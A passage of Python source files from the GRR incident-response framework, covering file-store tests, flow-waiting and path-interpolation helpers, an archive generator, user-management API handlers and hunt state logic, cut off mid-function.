self.assertLen(results, 5)
relpaths = [
os.path.relpath(p.stat_entry.pathspec.path, self.base_path)
for p in results
]
self.assertCountEqual(relpaths, [
"History.plist", "History.xml.plist", "test.plist",
"parser_test/com.google.code.grr.plist",
"parser_test/InstallHistory.plist"
])
for r in results:
aff4_obj = aff4.FACTORY.Open(
r.stat_entry.pathspec.AFF4Path(client_id), token=self.token)
# When files are uploaded to the server they are stored as VFSBlobImage.
self.assertIsInstance(aff4_obj, aff4_grr.VFSBlobImage)
# There is a STAT entry.
self.assertTrue(aff4_obj.Get(aff4_obj.Schema.STAT))
if not data_store.RelationalDBReadEnabled("filestore"):
# Make sure the HashFileStore has references to this file for
# all hashes.
hash_entry = data_store_utils.GetFileHashEntry(aff4_obj)
fs = filestore.HashFileStore
md5_refs = list(fs.GetReferencesMD5(hash_entry.md5, token=self.token))
self.assertIn(aff4_obj.urn, md5_refs)
sha1_refs = list(
fs.GetReferencesSHA1(hash_entry.sha1, token=self.token))
self.assertIn(aff4_obj.urn, sha1_refs)
sha256_refs = list(
fs.GetReferencesSHA256(hash_entry.sha256, token=self.token))
self.assertIn(aff4_obj.urn, sha256_refs)
# Open the file inside the file store.
urn, _ = fs(None, token=self.token).CheckHashes([hash_entry]).next()
filestore_fd = aff4.FACTORY.Open(urn, token=self.token)
# This is a VFSBlobImage too.
self.assertIsInstance(filestore_fd, aff4_grr.VFSBlobImage)
# No STAT object attached.
self.assertFalse(filestore_fd.Get(filestore_fd.Schema.STAT))
def main(args):
test_lib.main(args)
if __name__ == "__main__":
flags.StartMain(main)
```
#### File: grr_response_server/databases/mem_test.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
from absl.testing import absltest
from grr_response_core.lib import flags
from grr_response_server import db_test_mixin
from grr_response_server.databases import mem
from grr.test_lib import test_lib
FLAGS = flags.FLAGS
class MemoryDBTest(db_test_mixin.DatabaseTestMixin, absltest.TestCase):
def CreateDatabase(self):
return mem.InMemoryDB(), None
def main(args):
test_lib.main(args)
if __name__ == "__main__":
flags.StartMain(main)
```
#### File: grr_response_server/databases/migration_test.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
import os
from absl.testing import absltest
import mock
from grr_response_core import config
from grr_response_core.lib import flags
from grr_response_server import artifact_registry
from grr_response_server import data_store
from grr_response_server import db
from grr_response_server.databases import mem
from grr_response_server.databases import migration
from grr.test_lib import test_lib
def _SetUpArtifacts():
test_artifacts_file = os.path.join(config.CONFIG["Test.data_dir"],
"artifacts", "test_artifacts.json")
artifact_registry.REGISTRY.AddFileSource(test_artifacts_file)
class ArtifactMigrationTest(absltest.TestCase):
def setUp(self):
super(ArtifactMigrationTest, self).setUp()
self._db_patcher = mock.patch.object(
data_store, "REL_DB", db.DatabaseValidationWrapper(mem.InMemoryDB()))
self._db_patcher.start()
self._artifact_patcher = mock.patch.object(
artifact_registry, "REGISTRY", artifact_registry.ArtifactRegistry())
self._artifact_patcher.start()
def tearDown(self):
self._db_patcher.stop()
self._artifact_patcher.stop()
super(ArtifactMigrationTest, self).tearDown()
@mock.patch.object(data_store, "RelationalDBReadEnabled", return_value=False)
def testMigratesAllArtifactsWithoutReadFromRelDB(self, unused_data_store):
self.assertEmpty(data_store.REL_DB.ReadAllArtifacts())
_SetUpArtifacts()
self.assertEmpty(data_store.REL_DB.ReadAllArtifacts())
migration.MigrateArtifacts()
self.assertLen(data_store.REL_DB.ReadAllArtifacts(), 29)
@mock.patch.object(data_store, "RelationalDBReadEnabled", return_value=True)
def testMigratesAllArtifactsWithReadFromRelDB(self, unused_data_store):
self.assertEmpty(data_store.REL_DB.ReadAllArtifacts())
_SetUpArtifacts()
self.assertEmpty(data_store.REL_DB.ReadAllArtifacts())
migration.MigrateArtifacts()
self.assertLen(data_store.REL_DB.ReadAllArtifacts(), 29)
def testMigrationWithOverwriteDoesNotThrow(self):
_SetUpArtifacts()
migration.MigrateArtifacts()
migration.MigrateArtifacts(overwrite=True)
self.assertLen(data_store.REL_DB.ReadAllArtifacts(), 29)
def main(args):
test_lib.main(args)
if __name__ == "__main__":
flags.StartMain(main)
```
#### File: grr_response_server/data_stores/mysql_advanced_data_store_benchmark_test.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
from grr_response_core.lib import flags
from grr_response_server import data_store_test
from grr_response_server.data_stores import mysql_advanced_data_store_test
from grr.test_lib import test_lib
class MysqlAdvancedDataStoreBenchmarks(
mysql_advanced_data_store_test.MysqlAdvancedTestMixin,
data_store_test.DataStoreBenchmarks):
"""Benchmark the mysql data store abstraction."""
class MysqlAdvancedDataStoreCSVBenchmarks(
mysql_advanced_data_store_test.MysqlAdvancedTestMixin,
data_store_test.DataStoreCSVBenchmarks):
"""Benchmark the mysql data store abstraction."""
def main(args):
test_lib.main(args)
if __name__ == "__main__":
flags.StartMain(main)
```
#### File: server/grr_response_server/flow_utils.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
import logging
import time
from grr_response_server import aff4
from grr_response_server import flow
from grr_response_server.aff4_objects import aff4_grr
# How long to wait, by default, for a flow to finish.
DEFAULT_TIMEOUT = 650
def GetUserInfo(knowledge_base, user):
# TODO: This docstring cannot be a raw literal because there are
# issues with raw unicode literals on Python 2. Once support for Python 2 is
# dropped, it can be made raw again.
# pylint: disable=g-docstring-has-escape
"""Get a User protobuf for a specific user.
Args:
knowledge_base: An rdf_client.KnowledgeBase object.
user: Username as string. May contain domain like DOMAIN\\user.
Returns:
A User rdfvalue or None
"""
# pylint: enable=g-docstring-has-escape
if "\\" in user:
domain, user = user.split("\\", 1)
users = [
u for u in knowledge_base.users
if u.username == user and u.userdomain == domain
]
else:
users = [u for u in knowledge_base.users if u.username == user]
if not users:
return
else:
return users[0]
def UpdateVFSFileAndWait(client_id,
vfs_file_urn,
token=None,
timeout=DEFAULT_TIMEOUT):
"""Waits for a file to be updated on the client.
Calls the UpdateVFSFile flow on a urn and waits for both it and the
ListDirectory flow it calls to finish.
Note that this is needed because any flows UpdateVFSFile calls via
VFS Update methods will not become child flows of UpdateVFSFile,
and therefore waiting for UpdateVFSFile to complete is not enough.
Args:
client_id: Which client to run the flow on.
vfs_file_urn: Path to VFSFile to update.
token: The datastore access token.
timeout: How long to wait for a flow to finish, maximum.
"""
# Wait for the UpdateVFSFile flow.
update_flow_urn = StartFlowAndWait(
client_id,
token=token,
timeout=timeout,
flow_name=aff4_grr.UpdateVFSFile.__name__,
vfs_file_urn=vfs_file_urn)
update_flow_obj = aff4.FACTORY.Open(
update_flow_urn, token=token, aff4_type=flow.GRRFlow)
# Get the child flow so we can wait for it too.
sub_flow_urn = update_flow_obj.state.get_file_flow_urn
# If there was no subflow, no need to wait for it.
if not sub_flow_urn:
return
WaitForFlow(sub_flow_urn, token=token, timeout=timeout)
def WaitForFlow(flow_urn,
token=None,
timeout=DEFAULT_TIMEOUT,
max_sleep_time=1,
min_sleep_time=0.2,
dampening_multiplier=0.9):
"""Waits for a flow to finish, polling while we wait.
Args:
flow_urn: The urn of the flow to wait for.
token: The datastore access token.
timeout: How long to wait before giving up, usually because the client has
gone away.
max_sleep_time: The initial and longest time to wait in between polls.
min_sleep_time: The final and shortest time to wait in between polls.
dampening_multiplier: The current sleep time is multiplied by this number on
each iteration. Controls how fast the polling reaches its minimum sleep
time. You probably want this to be less than 1, unless you want to wait an
increasing amount of time in between flows.
Raises:
IOError: If we time out while waiting for the client.
"""
start_time = time.time()
sleep_time = max_sleep_time
while True:
# Reopen the AFF4Object to check if its status has changed, and also make
# sure it's a flow.
with aff4.FACTORY.Open(
flow_urn, token=token, aff4_type=flow.GRRFlow) as flow_obj:
# Stop if the flow is done or has timed out.
if time.time() - start_time > timeout:
logging.warn("Timed out after waiting %ss for %s!", timeout, flow_obj)
raise IOError("Timed out trying to access client! Is it connected?")
if not flow_obj.GetRunner().IsRunning():
break
# Decrease the time we sleep each iteration.
sleep_time = max(sleep_time * dampening_multiplier, min_sleep_time)
time.sleep(sleep_time)
logging.debug("Waiting for %s, sleeping for %.3fs", flow_obj, sleep_time)
def StartFlowAndWait(client_id,
token=None,
timeout=DEFAULT_TIMEOUT,
**flow_args):
"""Runs a flow and waits for it to finish.
Args:
client_id: The client id of the client to run on.
token: The datastore access token.
timeout: How long to wait for a flow to complete, maximum.
**flow_args: Pass through to flow.
Returns:
The urn of the flow that was run.
"""
flow_urn = flow.StartAFF4Flow(
client_id=client_id, token=token, sync=True, **flow_args)
WaitForFlow(flow_urn, token=token, timeout=timeout)
return flow_urn
# TODO(user): Deprecate this function once there is an alternative for
# CacheGrep.
def InterpolatePath(path, knowledge_base, users=None, path_args=None, depth=0):
"""Take a string as a path on a client and interpolate with client data.
Args:
path: A single string/unicode to be interpolated.
knowledge_base: An rdf_client.KnowledgeBase object.
users: A list of string usernames, or None.
path_args: A dict of additional args to use in interpolation. These take
precedence over any system provided variables.
depth: A counter for recursion depth.
Returns:
A single string if users is None, otherwise a list of strings.
"""
sys_formatters = {
# TODO(user): Collect this during discovery from the registry.
# HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\
# Value: SystemRoot
"systemroot": "c:\\Windows"
}
# Override any system formatters with path_args.
if path_args:
sys_formatters.update(path_args)
if users:
results = []
for user in users:
# Extract and interpolate user specific formatters.
user = GetUserInfo(knowledge_base, user)
if user:
formatters = dict((x.name, y) for x, y in user.ListSetFields())
formatters.update(sys_formatters)
try:
results.append(path.format(**formatters))
except KeyError:
pass # We may be missing values for some users.
return results
else:
try:
path = path.format(**sys_formatters)
except KeyError:
logging.warn("Failed path interpolation on %s", path)
return ""
if "{" in path and depth < 10:
path = InterpolatePath(
path,
knowledge_base=knowledge_base,
users=users,
path_args=path_args,
depth=depth + 1)
return path
```
#### File: gui/api_e2e_tests/client_labels_test.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
from grr_response_core.lib import flags
from grr_response_proto import objects_pb2
from grr_response_server import aff4
from grr_response_server.aff4_objects import aff4_grr
from grr_response_server.gui import api_e2e_test_lib
from grr.test_lib import test_lib
class ApiClientLibLabelsTest(api_e2e_test_lib.ApiE2ETest):
"""Tests VFS operations part of GRR Python API client library."""
def setUp(self):
super(ApiClientLibLabelsTest, self).setUp()
self.client_urn = self.SetupClient(0)
def testAddLabels(self):
client_ref = self.api.Client(client_id=self.client_urn.Basename())
self.assertEqual(list(client_ref.Get().data.labels), [])
with test_lib.FakeTime(42):
client_ref.AddLabels(["foo", "bar"])
self.assertEqual(
sorted(client_ref.Get().data.labels, key=lambda l: l.name), [
objects_pb2.ClientLabel(name="bar", owner=self.token.username),
objects_pb2.ClientLabel(name="foo", owner=self.token.username)
])
def testRemoveLabels(self):
with test_lib.FakeTime(42):
with aff4.FACTORY.Open(
self.client_urn,
aff4_type=aff4_grr.VFSGRRClient,
mode="rw",
token=self.token) as client_obj:
client_obj.AddLabels(["bar", "foo"])
client_ref = self.api.Client(client_id=self.client_urn.Basename())
self.assertEqual(
sorted(client_ref.Get().data.labels, key=lambda l: l.name), [
objects_pb2.ClientLabel(name="bar", owner=self.token.username),
objects_pb2.ClientLabel(name="foo", owner=self.token.username)
])
client_ref.RemoveLabel("foo")
self.assertEqual(
sorted(client_ref.Get().data.labels, key=lambda l: l.name),
[objects_pb2.ClientLabel(name="bar", owner=self.token.username)])
def main(argv):
test_lib.main(argv)
if __name__ == "__main__":
flags.StartMain(main)
```
#### File: grr_response_server/gui/archive_generator_aff4.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
import io
import logging
import os
import zipfile
from grr_response_core.lib import utils
from grr_response_core.lib.rdfvalues import client as rdf_client
from grr_response_core.lib.util import collection
from grr_response_core.lib.util import yaml
from grr_response_server import aff4
from grr_response_server import db
from grr_response_server.aff4_objects import aff4_grr
from grr_response_server.flows.general import export as flow_export
class Aff4CollectionArchiveGenerator(object):
"""Class that generates downloaded files archive from a collection."""
ZIP = "zip"
TAR_GZ = "tar.gz"
FILES_SKIPPED_WARNING = (
"# NOTE: Some files were skipped because they were referenced in the \n"
"# collection but were not downloaded by GRR, so there were no data \n"
"# blobs in the data store to archive.\n").encode("utf-8")
BATCH_SIZE = 1000
def __init__(self,
archive_format=ZIP,
prefix=None,
description=None,
predicate=None,
client_id=None):
"""CollectionArchiveGenerator constructor.
Args:
archive_format: May be ArchiveCollectionGenerator.ZIP or
ArchiveCollectionGenerator.TAR_GZ. Defaults to ZIP.
prefix: Name of the folder inside the archive that will contain all the
generated data.
description: String describing archive's contents. It will be included
into the auto-generated MANIFEST file. Defaults to 'Files archive
collection'.
predicate: If not None, only the files matching the predicate will be
archived, all others will be skipped. The predicate receives a
db.ClientPath as input.
client_id: The client_id to use when exporting a flow results collection.
Raises:
ValueError: if prefix is None.
"""
super(Aff4CollectionArchiveGenerator, self).__init__()
if archive_format == self.ZIP:
self.archive_generator = utils.StreamingZipGenerator(
compression=zipfile.ZIP_DEFLATED)
elif archive_format == self.TAR_GZ:
self.archive_generator = utils.StreamingTarGenerator()
else:
raise ValueError("Unknown archive format: %s" % archive_format)
if not prefix:
raise ValueError("Prefix can't be None.")
self.prefix = prefix
self.description = description or "Files archive collection"
self.total_files = 0
self.archived_files = set()
self.ignored_files = set()
self.failed_files = set()
self.predicate = predicate or (lambda _: True)
self.client_id = client_id
@property
def output_size(self):
return self.archive_generator.output_size
def _ItemsToUrns(self, items):
"""Converts collection items to aff4 urns suitable for downloading."""
for item in items:
try:
yield flow_export.CollectionItemToAff4Path(item, self.client_id)
except flow_export.ItemNotExportableError:
pass
def _GenerateDescription(self):
"""Generates description into a MANIFEST file in the archive."""
manifest = {
"description": self.description,
"processed_files": self.total_files,
"archived_files": len(self.archived_files),
"ignored_files": len(self.ignored_files),
"failed_files": len(self.failed_files)
}
if self.ignored_files:
manifest["ignored_files_list"] = list(self.ignored_files)
if self.failed_files:
manifest["failed_files_list"] = list(self.failed_files)
manifest_fd = io.BytesIO()
if self.total_files != len(self.archived_files):
manifest_fd.write(self.FILES_SKIPPED_WARNING)
manifest_fd.write(yaml.Dump(manifest).encode("utf-8"))
manifest_fd.seek(0)
st = os.stat_result((0o644, 0, 0, 0, 0, 0, len(manifest_fd.getvalue()), 0,
0, 0))
for chunk in self.archive_generator.WriteFromFD(
manifest_fd, os.path.join(self.prefix, "MANIFEST"), st=st):
yield chunk
def _GenerateClientInfo(self, client_fd):
"""Yields chucks of archive information for given client."""
summary_dict = client_fd.GetSummary().ToPrimitiveDict(
stringify_leaf_fields=True)
summary = yaml.Dump(summary_dict).encode("utf-8")
client_info_path = os.path.join(self.prefix, client_fd.urn.Basename(),
"client_info.yaml")
st = os.stat_result((0o644, 0, 0, 0, 0, 0, len(summary), 0, 0, 0))
yield self.archive_generator.WriteFileHeader(client_info_path, st=st)
yield self.archive_generator.WriteFileChunk(summary)
yield self.archive_generator.WriteFileFooter()
def Generate(self, items, token=None):
"""Generates archive from a given collection.
Iterates the collection and generates an archive by yielding contents
of every referenced AFF4Stream.
Args:
items: Iterable with items that point to aff4 paths.
token: User's ACLToken.
Yields:
Binary chunks comprising the generated archive.
"""
clients = set()
for fd_urn_batch in collection.Batch(
self._ItemsToUrns(items), self.BATCH_SIZE):
self.total_files += len(fd_urn_batch)
fds_to_write = {}
for fd in aff4.FACTORY.MultiOpen(fd_urn_batch, token=token):
# Derive a ClientPath from AFF4 URN to make new and old
# archive_generator predicate input consistent.
# TODO(user): This code is clearly hacky and intended to be removed.
urn_components = fd.urn.Split()
if urn_components[1:3] != ["fs", "os"]:
raise AssertionError("URN components are expected to start with "
"client, 'fs', 'os'. Got %r" % (urn_components,))
client_path = db.ClientPath.OS(
client_id=urn_components[0], components=urn_components[3:])
if not self.predicate(client_path):
self.ignored_files.add(utils.SmartUnicode(fd.urn))
continue
# Any file-like object with data in AFF4 should inherit AFF4Stream.
if isinstance(fd, aff4.AFF4Stream):
urn_components = fd.urn.Split()
clients.add(rdf_client.ClientURN(urn_components[0]))
content_path = os.path.join(self.prefix, *urn_components)
# Make sure size of the original file is passed. It's required
# when output_writer is StreamingTarWriter.
st = os.stat_result((0o644, 0, 0, 0, 0, 0, fd.size, 0, 0, 0))
fds_to_write[fd] = (content_path, st)
if fds_to_write:
prev_fd = None
for fd, chunk, exception in aff4.AFF4Stream.MultiStream(fds_to_write):
if exception:
logging.exception(exception)
try:
self.archived_files.remove(utils.SmartUnicode(fd.urn))
except KeyError:
pass # Failing is fine, since removal should be idempotent.
self.failed_files.add(utils.SmartUnicode(fd.urn))
continue
if prev_fd != fd:
if prev_fd:
yield self.archive_generator.WriteFileFooter()
prev_fd = fd
content_path, st = fds_to_write[fd]
yield self.archive_generator.WriteFileHeader(content_path, st=st)
yield self.archive_generator.WriteFileChunk(chunk)
self.archived_files.add(utils.SmartUnicode(fd.urn))
if self.archive_generator.is_file_write_in_progress:
yield self.archive_generator.WriteFileFooter()
if clients:
for client_urn_batch in collection.Batch(clients, self.BATCH_SIZE):
for fd in aff4.FACTORY.MultiOpen(
client_urn_batch, aff4_type=aff4_grr.VFSGRRClient, token=token):
for chunk in self._GenerateClientInfo(fd):
yield chunk
for chunk in self._GenerateDescription():
yield chunk
yield self.archive_generator.Close()
```
#### File: root/api_plugins/user_management.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
from grr_response_core.lib.rdfvalues import events as rdf_events
from grr_response_core.lib.rdfvalues import structs as rdf_structs
from grr_response_proto.api.root import user_management_pb2
from grr_response_server import access_control
from grr_response_server import aff4
from grr_response_server import data_store
from grr_response_server import db
from grr_response_server import events
from grr_response_server.aff4_objects import users
from grr_response_server.gui import api_call_handler_base
from grr_response_server.gui.api_plugins import user as api_user
class ApiCreateGrrUserArgs(rdf_structs.RDFProtoStruct):
protobuf = user_management_pb2.ApiCreateGrrUserArgs
class ApiCreateGrrUserHandler(api_call_handler_base.ApiCallHandler):
"""Creates a new GRR user."""
args_type = ApiCreateGrrUserArgs
result_type = api_user.ApiGrrUser
def Handle(self, args, token=None):
if not args.username:
raise ValueError("username can't be empty.")
if args.user_type != args.UserType.USER_TYPE_ADMIN:
args.user_type = args.UserType.USER_TYPE_STANDARD
if data_store.RelationalDBReadEnabled():
return self._HandleRelational(args)
else:
return self._HandleAff4(args, token)
def _HandleAff4(self, args, token):
user_urn = aff4.ROOT_URN.Add("users").Add(args.username)
events.Events.PublishEvent(
"Audit",
rdf_events.AuditEvent(
user=token.username, action="USER_ADD", urn=user_urn),
token=token)
if aff4.FACTORY.ExistsWithType(
user_urn, aff4_type=users.GRRUser, token=token):
raise access_control.UnauthorizedAccess(
"Cannot add user %s: User already exists." % args.username)
with aff4.FACTORY.Create(
user_urn, aff4_type=users.GRRUser, mode="rw", token=token) as fd:
if args.HasField("password"):
fd.SetPassword(args.password)
if args.user_type == args.UserType.USER_TYPE_ADMIN:
fd.AddLabels(["admin"], owner="GRR")
return api_user.ApiGrrUser().InitFromAff4Object(fd)
def _HandleRelational(self, args):
data_store.REL_DB.WriteGRRUser(
username=args.username,
password=<PASSWORD> if args.HasField("password") else None,
user_type=args.user_type,
)
user = data_store.REL_DB.ReadGRRUser(args.username)
return api_user.ApiGrrUser().InitFromDatabaseObject(user)
class ApiDeleteGrrUserArgs(rdf_structs.RDFProtoStruct):
protobuf = user_management_pb2.ApiDeleteGrrUserArgs
class ApiDeleteGrrUserHandler(api_call_handler_base.ApiCallHandler):
"""Deletes a GRR user."""
args_type = ApiDeleteGrrUserArgs
def Handle(self, args, token=None):
if not args.username:
raise ValueError("username can't be empty.")
if data_store.RelationalDBReadEnabled():
self._HandleRelational(args)
else:
self._HandleAff4(args, token)
def _HandleAff4(self, args, token):
user_urn = aff4.ROOT_URN.Add("users").Add(args.username)
events.Events.PublishEvent(
"Audit",
rdf_events.AuditEvent(
user=token.username, action="USER_DELETE", urn=user_urn),
token=token)
if not aff4.FACTORY.ExistsWithType(
user_urn, aff4_type=users.GRRUser, token=token):
raise api_call_handler_base.ResourceNotFoundError(
"GRR user with username '%s' could not be found." % args.username)
aff4.FACTORY.Delete(user_urn, token=token)
def _HandleRelational(self, args):
try:
data_store.REL_DB.DeleteGRRUser(args.username)
except db.UnknownGRRUserError as e:
raise api_call_handler_base.ResourceNotFoundError(e.message)
class ApiModifyGrrUserArgs(rdf_structs.RDFProtoStruct):
protobuf = user_management_pb2.ApiModifyGrrUserArgs
class ApiModifyGrrUserHandler(api_call_handler_base.ApiCallHandler):
"""Modifies a GRR user."""
args_type = ApiModifyGrrUserArgs
result_type = api_user.ApiGrrUser
def Handle(self, args, token=None):
if not args.username:
raise ValueError("username can't be empty.")
if args.HasField(
"user_type") and args.user_type != args.UserType.USER_TYPE_ADMIN:
args.user_type = args.UserType.USER_TYPE_STANDARD
if data_store.RelationalDBReadEnabled():
return self._HandleRelational(args)
else:
return self._HandleAff4(args, token)
def _HandleAff4(self, args, token):
user_urn = aff4.ROOT_URN.Add("users").Add(args.username)
events.Events.PublishEvent(
"Audit",
rdf_events.AuditEvent(
user=token.username, action="USER_UPDATE", urn=user_urn),
token=token)
with aff4.FACTORY.Open(
user_urn, aff4_type=users.GRRUser, mode="rw", token=token) as fd:
if args.HasField("password"):
fd.SetPassword(args.password)
if args.user_type == args.UserType.USER_TYPE_ADMIN:
fd.AddLabels(["admin"], owner="GRR")
elif args.user_type == args.UserType.USER_TYPE_STANDARD:
fd.RemoveLabels(["admin"], owner="GRR")
return api_user.ApiGrrUser().InitFromAff4Object(fd)
def _HandleRelational(self, args):
# query user, to throw if a nonexistent user should be modified
data_store.REL_DB.ReadGRRUser(args.username)
if args.HasField("password"):
password = args.password
else:
password = None
if args.HasField("user_type"):
user_type = args.user_type
else:
user_type = None
data_store.REL_DB.WriteGRRUser(
username=args.username, password=password, user_type=user_type)
user = data_store.REL_DB.ReadGRRUser(args.username)
return api_user.ApiGrrUser().InitFromDatabaseObject(user)
class ApiListGrrUsersArgs(rdf_structs.RDFProtoStruct):
protobuf = user_management_pb2.ApiListGrrUsersArgs
class ApiListGrrUsersResult(rdf_structs.RDFProtoStruct):
protobuf = user_management_pb2.ApiListGrrUsersResult
rdf_deps = [
api_user.ApiGrrUser,
]
class ApiListGrrUsersHandler(api_call_handler_base.ApiCallHandler):
"""Lists all users registered in the system."""
args_type = ApiListGrrUsersArgs
result_type = ApiListGrrUsersResult
def Handle(self, args, token=None):
if data_store.RelationalDBReadEnabled():
return self._HandleRelational(args)
else:
return self._HandleAff4(args, token)
def _HandleAff4(self, args, token=None):
users_root = aff4.FACTORY.Open(aff4.ROOT_URN.Add("users"), token=token)
usernames = sorted(users_root.ListChildren())
total_count = len(usernames)
if args.count:
usernames = usernames[args.offset:args.offset + args.count]
else:
usernames = usernames[args.offset:]
items = []
for aff4_obj in aff4.FACTORY.MultiOpen(
usernames, aff4_type=users.GRRUser, token=token):
items.append(api_user.ApiGrrUser().InitFromAff4Object(aff4_obj))
return ApiListGrrUsersResult(total_count=total_count, items=items)
def _HandleRelational(self, args):
total_count = data_store.REL_DB.CountGRRUsers()
db_users = data_store.REL_DB.ReadGRRUsers(
offset=args.offset, count=args.count)
items = [api_user.ApiGrrUser().InitFromDatabaseObject(u) for u in db_users]
return ApiListGrrUsersResult(total_count=total_count, items=items)
class ApiGetGrrUserArgs(rdf_structs.RDFProtoStruct):
protobuf = user_management_pb2.ApiGetGrrUserArgs
class ApiGetGrrUserHandler(api_call_handler_base.ApiCallHandler):
"""Returns information about a user with a given name."""
args_type = ApiGetGrrUserArgs
result_type = api_user.ApiGrrUser
def Handle(self, args, token=None):
if not args.username:
raise ValueError("username can't be empty.")
if data_store.RelationalDBReadEnabled():
return self._HandleRelational(args)
else:
return self._HandleAff4(args, token)
def _HandleAff4(self, args, token=None):
user_urn = aff4.ROOT_URN.Add("users").Add(args.username)
try:
fd = aff4.FACTORY.Open(
user_urn, aff4_type=users.GRRUser, mode="r", token=token)
return api_user.ApiGrrUser().InitFromAff4Object(fd)
except aff4.InstantiationError:
raise api_call_handler_base.ResourceNotFoundError(
"GRR user with username '%s' could not be found." % args.username)
def _HandleRelational(self, args):
try:
user = data_store.REL_DB.ReadGRRUser(args.username)
return api_user.ApiGrrUser().InitFromDatabaseObject(user)
except db.UnknownGRRUserError as e:
raise api_call_handler_base.ResourceNotFoundError(e.message)
```
#### File: server/grr_response_server/hunt.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
import sys
from grr_response_core.lib import rdfvalue
from grr_response_core.lib import registry
from grr_response_server import access_control
from grr_response_server import data_store
from grr_response_server import db
from grr_response_server import flow
from grr_response_server import foreman_rules
from grr_response_server import notification
from grr_response_server.aff4_objects import users as aff4_users
from grr_response_server.rdfvalues import flow_objects as rdf_flow_objects
from grr_response_server.rdfvalues import hunt_objects as rdf_hunt_objects
from grr_response_server.rdfvalues import objects as rdf_objects
MIN_CLIENTS_FOR_AVERAGE_THRESHOLDS = 1000
class Error(Exception):
pass
class UnknownHuntTypeError(Error):
pass
class OnlyPausedHuntCanBeModifiedError(Error):
def __init__(self, hunt_obj):
super(OnlyPausedHuntCanBeModifiedError,
self).__init__("Hunt %s can't be modified since it's in state %s." %
(hunt_obj.hunt_id, hunt_obj.hunt_state))
class OnlyPausedHuntCanBeStartedError(Error):
def __init__(self, hunt_obj):
super(OnlyPausedHuntCanBeStartedError,
self).__init__("Hunt %s can't be started since it's in state %s." %
(hunt_obj.hunt_id, hunt_obj.hunt_state))
class OnlyStartedHuntCanBePausedError(Error):
def __init__(self, hunt_obj):
super(OnlyStartedHuntCanBePausedError,
self).__init__("Hunt %s can't be paused since it's in state %s." %
(hunt_obj.hunt_id, hunt_obj.hunt_state))
class OnlyStartedOrPausedHuntCanBeStoppedError(Error):
def __init__(self, hunt_obj):
super(OnlyStartedOrPausedHuntCanBeStoppedError,
self).__init__("Hunt %s can't be stopped since it's in state %s." %
(hunt_obj.hunt_id, hunt_obj.hunt_state))
def IsLegacyHunt(hunt_id):
return hunt_id.startswith("H:")
def StopHuntIfAverageLimitsExceeded(hunt_obj):
"""Stops the hunt if average limites are exceeded."""
# Do nothing if the hunt is already stopped.
if hunt_obj.hunt_state == rdf_hunt_objects.Hunt.HuntState.STOPPED:
return hunt_obj
total_clients = (
hunt_obj.num_successful_clients + hunt_obj.num_failed_clients +
hunt_obj.num_crashed_clients)
if total_clients < MIN_CLIENTS_FOR_AVERAGE_THRESHOLDS:
return hunt_obj
# Check average per-client results count limit.
if hunt_obj.avg_results_per_client_limit:
avg_results_per_client = (hunt_obj.num_results / total_clients)
if avg_results_per_client > hunt_obj.avg_results_per_client_limit:
# Stop the hunt since we get too many results per client.
reason = ("Hunt %s reached the average results per client "
"limit of %d and was stopped.") % (
hunt_obj.hunt_id, hunt_obj.avg_results_per_client_limit)
return StopHunt(hunt_obj.hunt_id, reason=reason)
# Check average per-client CPU seconds limit.
if hunt_obj.avg_cpu_seconds_per_client_limit:
avg_cpu_seconds_per_client = (
(hunt_obj.client_resources_stats.user_cpu_stats.sum +
hunt_obj.client_resources_stats.system_cpu_stats.sum) / total_clients)
if avg_cpu_seconds_per_client > hunt_obj.avg_cpu_seconds_per_client_limit:
# Stop the hunt since we use too many CPUs per client.
reason = ("Hunt %s reached the average CPU seconds per client "
"limit of %d and was stopped.") % (
hunt_obj.hunt_id, hunt_obj.avg_cpu_seconds_per_client_limit)
return StopHunt(hunt_obj.hunt_id, reason=reason)
# Check average per-client network bytes limit.
if hunt_obj.avg_network_bytes_per_client_limit:
avg_network_bytes_per_client = (
hunt_obj.client_resources_stats.network_bytes_sent_stats.sum /
total_clients)
if (avg_network_bytes_per_client >
hunt_obj.avg_network_bytes_per_client_limit):
# Stop the hunt since we use too many network bytes sent
# per client.
reason = ("Hunt %s reached the average network bytes per client "
"limit of %d and was stopped.") % (
hunt_obj.hunt_id,
hunt_obj.avg_network_bytes_per_client_limit)
return StopHunt(hunt_obj.hunt_id, reason=reason)
return hunt_obj
def CompleteHuntIfExpirationTimeReached(hunt_obj):
"""Marks the hunt as complete if it's past its expiry time."""
if (hunt_obj.hunt_state not in [
rdf_hunt_objects.Hunt.HuntState.STOPPED,
rdf_hunt_objects.Hunt.HuntState.COMPLETED
] and hunt_obj.expiry_time < rdfvalue.RDFDatetime.Now()):
StopHunt(hunt_obj.hunt_id, reason="Hunt completed.")
def UpdateFn(h):
h.hunt_state = h.HuntState.COMPLETED
return h
return data_store.REL_DB.UpdateHuntObject(hunt_obj.hunt_id, UpdateFn)
return hunt_obj
def StartHunt(hunt_id):
"""Starts a hunt with a given id."""
hunt_obj = data_store.REL_DB.ReadHuntObject(hunt_id)
output_plugins_states = None
if hunt_obj.output_plugins and not hunt_obj.output_plugins_states:
output_plugins_states = flow.GetOutputPluginStates(
hunt_obj.output_plugins,
source="hunts/%s" % hunt_obj.hunt_id,
token=access_control.ACLToken(username=hunt_obj.creator))
for ops in output_plugins_states:
ops.plugin_state["success_count"] = 0
ops.plugin_state["error_count"] = 0
def UpdateFn(h):
"""Updates given hunt in a transaction."""
if h.hunt_state != h.HuntState.PAUSED:
raise OnlyPausedHuntCanBeStartedError(h)
if (output_plugins_states is not None and
not hunt_obj.output_plugins_states):
h.output_plugins_states = output_plugins_states
h.hunt_state = h.HuntState.STARTED
h.hunt_state_comment = None
h.next_client_due = rdfvalue.RDFDatetime.Now()
return h
hunt_obj = data_store.REL_DB.UpdateHuntObject(hunt_id, UpdateFn)
if hunt_obj.hunt_state != hunt_obj.HuntState.STARTED:
return
foreman_condition = foreman_rules.ForemanCondition(
creation_time=rdfvalue.RDFDatetime.Now(),
expiration_time=hunt_obj.expiry_time,
